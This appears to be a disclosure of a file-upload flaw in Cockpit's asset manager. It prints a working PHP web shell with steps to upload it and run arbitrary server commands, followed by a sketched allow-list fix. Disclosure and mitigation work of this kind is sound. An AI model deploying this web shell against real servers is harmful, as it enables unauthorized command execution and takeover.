There are no extension checks during file upload. An attacker may upload a file that executes malicious code on the server.
Step 1: Create a file with the content below and save it as evil.php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
Step 2: Log in to the Cockpit web server
Step 3: Go to assets
Step 4: Upload Assets
Step 5: Upload the file that was created.
Step 6: Copy the asset link and paste it into a new tab.
Step 7: Any command can now be executed on the server.
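
The missing check, sketched as an added example (this is not Cockpit's code or its actual fix): an upload handler that accepts only allow-listed extensions and stores the file under a server-generated name. The function name `safeAssetName`, the constant `ALLOWED_UPLOAD_EXTENSIONS` and the allow-list contents are assumptions for illustration.

```php
<?php
declare(strict_types=1);

// Assumed allow-list for an asset manager; adjust to the types the site really needs.
const ALLOWED_UPLOAD_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt'];

/**
 * Hypothetical helper: returns the name to store an upload under,
 * or null when the upload must be rejected.
 */
function safeAssetName(string $clientName): ?string
{
    // Discard any directory components supplied by the client.
    $base = basename(str_replace('\\', '/', $clientName));

    // Reject empty names, dotfiles such as .htaccess, and embedded NUL bytes.
    if ($base === '' || $base[0] === '.' || strpos($base, "\0") !== false) {
        return null;
    }

    // Only the final extension decides, compared case-insensitively
    // against the allow-list (never a deny-list of "bad" extensions).
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_UPLOAD_EXTENSIONS, true)) {
        return null;
    }

    // The stored name is generated server-side, so no client-chosen segment
    // (for example the ".php" in "evil.php.jpg") survives on disk.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample names, including the evil.php from the steps above.
$samples = ['photo.JPG', 'evil.php', 'evil.php.jpg', '.htaccess', 'shell.phtml', 'noext'];
foreach ($samples as $name) {
    $stored = safeAssetName($name);
    printf("%-14s => %s\n", $name, $stored ?? 'REJECTED');
}
```

The upload directory should additionally be configured so the web server never hands its contents to the PHP interpreter, so that a gap in the extension check does not become code execution.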